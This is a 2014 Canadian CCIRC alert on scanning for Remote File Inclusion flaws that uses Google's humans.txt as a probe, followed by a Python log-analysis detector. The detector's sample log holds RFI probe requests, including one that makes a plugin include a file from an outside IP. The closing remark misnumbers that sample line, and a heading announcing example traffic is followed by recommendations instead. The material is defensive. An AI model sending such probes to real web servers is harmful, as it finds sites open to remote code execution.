Remote File Inclusion vulnerability scanning
Date: 14 January 2014
The purpose of this alert is to bring attention to increased scanning activity for Remote File Inclusion (RFI) vulnerabilities.
CCIRC has observed increased reporting of RFI vulnerability scanning against internet facing web servers. Exploitation of an RFI vulnerability could lead to a variety of malicious activity, including remote code execution, DoS attacks, theft of personal/financial information, or website defacement.
Recently observed scans attempt to determine remotely whether known RFI vulnerabilities exist in various web applications, including phpBB and WordPress, among others. The scans pass the legitimate file located at 'www[.]google.com/humans[.]txt' to the web application. If the scan is successful, the scanner/attacker receives a response from the targeted web application containing the contents of humans.txt, originally from Google.com. This proves that the web application contains an RFI vulnerability that could be exploited at a later date.
Please note that the URL 'www[.]google.com/humans[.]txt' is not malicious but is used by the scanner/attacker to determine whether the web application is exploitable.
Examples of traffic observed looking for RFI vulnerabilities:
- CCIRC recommends reviewing web server log files for unusual activity or entries. Entries that contain the string “http://www.google[.]com/humans.txt” should be considered suspicious and investigated further for signs of compromise.
- CCIRC recommends that system administrators test and deploy the vendor-released updates to affected applications accordingly.
- Follow the suggested action as outlined in CCIRC's Information Note IN13-001, Content Management Systems Security and Associated Risks.
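The log review recommended above, as an added example that is not part of the CCIRC alert: it parses combined-format access log lines, percent-decodes each query parameter, and flags both the humans.txt probe described in this alert and, more generally, any parameter whose value is a remote URL. The log lines are constructed sample data, not observed traffic.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed combined-format access log lines (sample data, not real traffic).
SAMPLE_LOG = """\
203.0.113.10 - - [14/Jan/2014:10:01:02 +0000] "GET /index.php?page=http://www.google.com/humans.txt HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.10 - - [14/Jan/2014:10:01:03 +0000] "GET /forum/config.php?inc=http%3A%2F%2Fwww.google.com%2Fhumans.txt%3F HTTP/1.1" 200 298 "-" "Mozilla/5.0"
198.51.100.7 - - [14/Jan/2014:10:02:11 +0000] "GET /blog/?p=42 HTTP/1.1" 200 8120 "-" "Mozilla/5.0"
198.51.100.7 - - [14/Jan/2014:10:02:12 +0000] "GET /blog/wp-content/plugins/x/y.php?file=https://203.0.113.99/include.txt HTTP/1.1" 500 0 "-" "curl/7.30"
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')
PROBE_MARKER = "www.google.com/humans.txt"          # benign file the scanners ask the app to include
REMOTE_SCHEMES = ("http://", "https://", "ftp://")  # a URL in a parameter value is always worth a look


def classify_params(target):
    """Yield (param, value, kind) for query parameters whose value points at a remote
    resource. parse_qsl percent-decodes, so inc=http%3A%2F%2F... is caught as well."""
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        lowered = value.lower()
        if PROBE_MARKER in lowered:
            yield name, value, "rfi-probe-humans.txt"
        elif lowered.startswith(REMOTE_SCHEMES):
            yield name, value, "rfi-remote-include"


def scan_log(text):
    """One finding per suspicious parameter, with the fields an analyst pivots on."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not in combined format; skip rather than guess
        for param, value, kind in classify_params(m["target"]):
            findings.append({
                "ip": m["ip"], "ts": m["ts"], "status": int(m["status"]),
                "target": m["target"], "param": param, "value": value, "kind": kind,
                # HTTP 200 to a probe is a lead, not proof: confirm by checking whether the
                # response body actually carried humans.txt, or by testing the include path.
                "probe_answered": kind == "rfi-probe-humans.txt" and m["status"] == "200",
            })
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['ts']} {f['ip']:14} {f['kind']:21} {f['param']}={f['value']} HTTP {f['status']}")
```

A hit on the third sample line shows why the general check matters: once the scan has confirmed the vulnerability, the follow-up request carries the attacker's own URL rather than the humans.txt marker.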
Note to Readers
In support of Public Safety's mission to build a safe and resilient Canada, CCIRC's mandate is to help ensure the security and resilience of the vital non-federal government cyber systems that underpin Canada's national security, public safety and economic prosperity. As Canada's computer security incident response team, CCIRC is Canada's national coordination centre for the prevention and mitigation of, preparedness for, response to, and recovery from cyber incidents on non-federal government systems. It does this by providing authoritative advice and support, and coordinating information sharing and incident response.
Please note that CCIRC's PGP key has recently been updated.
For general information, please contact Public Safety Canada's Public Affairs division at:
Telephone: 613-944-4875 or 1-800-830-3118